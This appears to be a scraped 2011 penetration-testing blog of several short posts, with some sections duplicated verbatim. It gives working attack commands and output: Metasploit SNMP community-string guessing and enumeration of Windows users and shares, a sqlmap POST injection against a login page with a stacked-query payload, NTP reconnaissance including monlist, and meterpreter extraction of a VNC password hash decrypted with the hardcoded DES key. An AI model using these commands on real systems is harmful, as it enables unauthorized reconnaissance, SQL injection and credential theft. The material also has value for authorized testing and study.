my new favorite modules (for today) are the snmp_enumusers and snmp_enumshares modules that work against windows hosts that have snmp running.
msf > use auxiliary/scanner/snmp/
use auxiliary/scanner/snmp/aix_version
use auxiliary/scanner/snmp/snmp_enumshares
use auxiliary/scanner/snmp/cisco_config_tftp
use auxiliary/scanner/snmp/snmp_enumusers
use auxiliary/scanner/snmp/cisco_upload_file
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_set
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_login) > run
[+] SNMP: 192.168.100.119 community string: 'public' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[+] SNMP: 192.168.100.119 community string: 'private' info: 'Hardware: x86 Family 6 Model 23 Stepping 6 AT/AT COMPATIBLE - Software: Windows Version 5.2 (Build 3790 Multiprocessor Free)'
[*] Validating scan results from 1 hosts...
[*] Host 192.168.100.119 provides READ-WRITE access with community 'private'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate local user accounts on a Windows system via SNMP
msf auxiliary(snmp_enumusers) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumusers) > run
[+] 192.168.100.119 Found Users: ASPNET, Administrator, Guest, IUSR_SRV, IWAM_SRV, SUPPORT_388945a0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_enumusers) > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(snmp_enumshares) > info
...SNIP...
Description:
This module will use LanManager OID values to enumerate SMB shares on a Windows system via SNMP
msf auxiliary(snmp_enumshares) > set RHOSTS 192.168.100.119
RHOSTS => 192.168.100.119
msf auxiliary(snmp_enumshares) > run
[+] 192.168.100.119
backup - (C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\backup)
MetaInfoBack - (C:\WINDOWS\system32\inetsrv\MetaInfoBack)
NewBackup2 - (J:\NewBackup2)
SharepointBackup - (K:\SharepointBackup)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Wednesday, March 23, 2011
Monday, March 21, 2011
sqlmap with POST requests
Notes for sqlmap and POST requests since every f**king tutorial only covers GETs
options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
options you'll want to use
-u URL, --url=URL <-- Target url
--method=METHOD <-- HTTP method, GET or POST (default GET)
--data=DATA <-- Data string to be sent through POST
-p TESTPARAMETER <-- Testable parameter(s)
--prefix=PREFIX <-- Injection payload prefix string
--postfix=POSTFIX <-- Injection payload postfix string
--dbms=DBMS <--Force back-end DBMS to this value
*--dbms= if sqlmap is sucking
we'll assume we have a simple post request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
*--dbms= if sqlmap is sucking
we'll assume we have a simple post request
user@ubuntu:~/pentest/sqlmap-dev$ python sqlmap.py -u "http://192.168.1.100/fancyshmancy/login.aspx" --method POST --data "usernameTxt=blah&passwordTxt=blah&submitBtn=Log+On" -p "usernameTxt" --prefix="')" --dbms=mssql -v 2
--method to pass the POST option
--data to pass the paramaters that are required for the POST
-p to pass the injectable field, so in this case the username field (usernameTxt)
--prefix to pass what needs to be passed before we can inject. we had to issue a tick ( ' ) and right parenthesis ( ) ) to close out the query
--dbms to tell it the backend was mssql
this yields us an sqlmap query like so:
Place: POST
Parameter: usernameTxt
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: usernameTxt=blah'); WAITFOR DELAY '0:0:5';-- AND ('yTwo'='yTwo&passwordTxt=blah&submitBtn=Log+On
---
Friday, March 18, 2011
I forgot my NTP stuff, so here's more notes on it
yeah what the title says, for some reason the NTP module wasn't working for me in Metasploit so i had to remember how to use the NTP tools to pull some info.
here are my notes:
http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205
http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]
ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar
ntpq>
chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
remote refid st t when poll reach delay offset jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030
ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)
ntpq> host
current host is 192.168.1.60
ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)", processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,
clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144
ntpq> hostnames
hostnames being shown
ntpq> keytype
keytype is MD5
ntpq> ntpversion
NTP version being claimed is 2
ntpq> associations
ind assID status conf reach auth condition last_event cnt
===========================================================
1 18290 964a yes yes none sys.peer 4
ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,
filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96
chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
remote address port local address count m ver code avgint lstint
===============================================================================
computerville.wxy.suk.de 123 192.168.1.60 6832 4 4
90 1044 476
chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s
chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client computerville.wxy.suk.de
chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974
chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
some-domain 255.255.255.255 0 ignore
osafs.org 255.255.255.255 0 ignore
:: :: 0 nomodify, nopeer
ip6-localhost ffff:ffff:ffff: 0 ignore
fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore
here are my notes:
http://www.eecis.udel.edu/~mills/ntp/html/ntpdc.html
ntpdc -c sysinfo 192.168.1.205
ntpdc -c monolist 192.168.1.205
ntpdc -c listpeers 192.168.1.205
ntpdc -c peers 192.168.1.205
ntpdc -c reslist 192.168.1.205
http://www.eecis.udel.edu/~mills/ntp/html/ntpq.html
ntpq 192.168.1.205
-> version
-> host
-> readlist
-> lpeers
-> hostnames
-> keytype
-> ntpversion
-> associations
-> pstatus [#]
ntpq> help
ntpq commands:
addvars debug lopeers passociations rl
associations delay lpassociations passwd rmvars
authenticate exit lpeers peers rv
cl help mreadlist poll showvars
clearvars host mreadvar pstatus timeout
clocklist hostnames mrl quit version
clockvar keyid mrv raw writelist
cooked keytype ntpversion readlist writevar
cv lassociations opeers readvar
ntpq>
chris@notbt:/pentest$ ntpq 192.168.1.60
ntpq> lpeers
remote refid st t when poll reach delay offset jitter
==============================================================================
*computerville.wxy.suk 192.168.1.108 2 u 338 1024 377 35.327 -0.702 1.030
ntpq> version
ntpq 4.2.4p8@1.1612-o Fri Apr 9 00:28:48 UTC 2010 (1)
ntpq> host
current host is 192.168.1.60
ntpq> readlist
assID=0 status=0658 leap_none, sync_ntp, 5 events, event_8,
version="ntpd 4.2.6p2@1.2194-o Sun Oct 17 02:04:37 UTC 2010 (1)", processor="x86_64", system="Linux/2.6.35.4-x86_64-linode16", leap=00,strasuk=3, precision=-20, rootdelay=58.612, rootdisp=86.969, refid=1.2.3.102,
reftime=d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880,
clock=d12a98c9.eee329a7 Wed, Mar 16 2011 2:02:49.933, peer=18290,
tc=10, mintc=3, offset=-0.702, frequency=-16.787, sys_jitter=1.061, clk_jitter=0.881, clk_wander=0.144
ntpq> hostnames
hostnames being shown
ntpq> keytype
keytype is MD5
ntpq> ntpversion
NTP version being claimed is 2
ntpq> associations
ind assID status conf reach auth condition last_event cnt
===========================================================
1 18290 964a yes yes none sys.peer 4
ntpq> pstatus 18290
assID=18290 status=964a reach, conf, sel_sys.peer, 4 events, event_10,
srcadr=computerville.wxy.suk.de, srcport=123, dstadr=192.168.1.60,
dstport=123, leap=00, strasuk=2, precision=-20, rootdelay=22.964,
rootdisp=33.768, refid=192.168.1.108,reftime=d12a9360.1f34b00f Wed, Mar 16 2011 1:39:44.121,
rec=d12a976a.e177c84f Wed, Mar 16 2011 1:56:58.880, reach=377,
unreach=0, hmode=3, pmode=4, hpoll=10, ppoll=10, headway=0, flash=00 ok,
keyid=0, offset=-0.702, delay=35.327, dispersion=19.528, jitter=1.030,xleave=0.050, filtdelay= 35.56 35.33 35.47 35.69 35.81 35.42 35.38 35.58,
filtoffset= -0.85 -0.70 -0.86 -1.42 -1.63 -1.90 -2.42 -1.97,
filtdisp= 0.00 16.25 32.00 47.93 63.45 79.40 95.69 111.96
chris@notbt:/pentest$ ntpdc -c monlist 192.168.1.60
remote address port local address count m ver code avgint lstint
===============================================================================
computerville.wxy.suk.de 123 192.168.1.60 6832 4 4
90 1044 476
chris@notbt:/pentest$ ntpdc -c sysinfo 192.168.1.60
system peer: computerville.wxy.suk.de
system peer mode: client
leap indicator: 00
strasuk: 3
precision: -20
root distance: 0.05861 s
root dispersion: 0.08899 s
reference ID: [1.2.3.102]
reference time: d12a932f.e1697c36 Wed, Mar 16 2011 1:38:55.880
system flags: auth monitor ntp kernel stats
jitter: 0.001053 s
stability: 0.000 ppm
broadcastdelay: 0.000000 s
authdelay: 0.000000 s
chris@notbt:/pentest$ ntpdc -c listpeers 192.168.1.60
client computerville.wxy.suk.de
chris@notbt:/pentest$ ntpdc -c peers 192.168.1.60
remote local st poll reach delay offset disp
=======================================================================
*computerville.wxy.suk 192.168.1.60 2 1024 377 0.03532 -0.000702 0.13974
chris@notbt:/pentest$ ntpdc -c reslist 192.168.1.60
address mask count flags
=====================================================================
0.0.0.0 0.0.0.0 6846 nomodify, nopeer
some-domain 255.255.255.255 0 none
some-domain 255.255.255.255 0 ignore
osafs.org 255.255.255.255 0 ignore
:: :: 0 nomodify, nopeer
ip6-localhost ffff:ffff:ffff: 0 ignore
fe80::fcfd:b2ff ffff:ffff:ffff: 0 ignore
Tuesday, March 15, 2011
VNC passwords and Metasploit and DES
inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.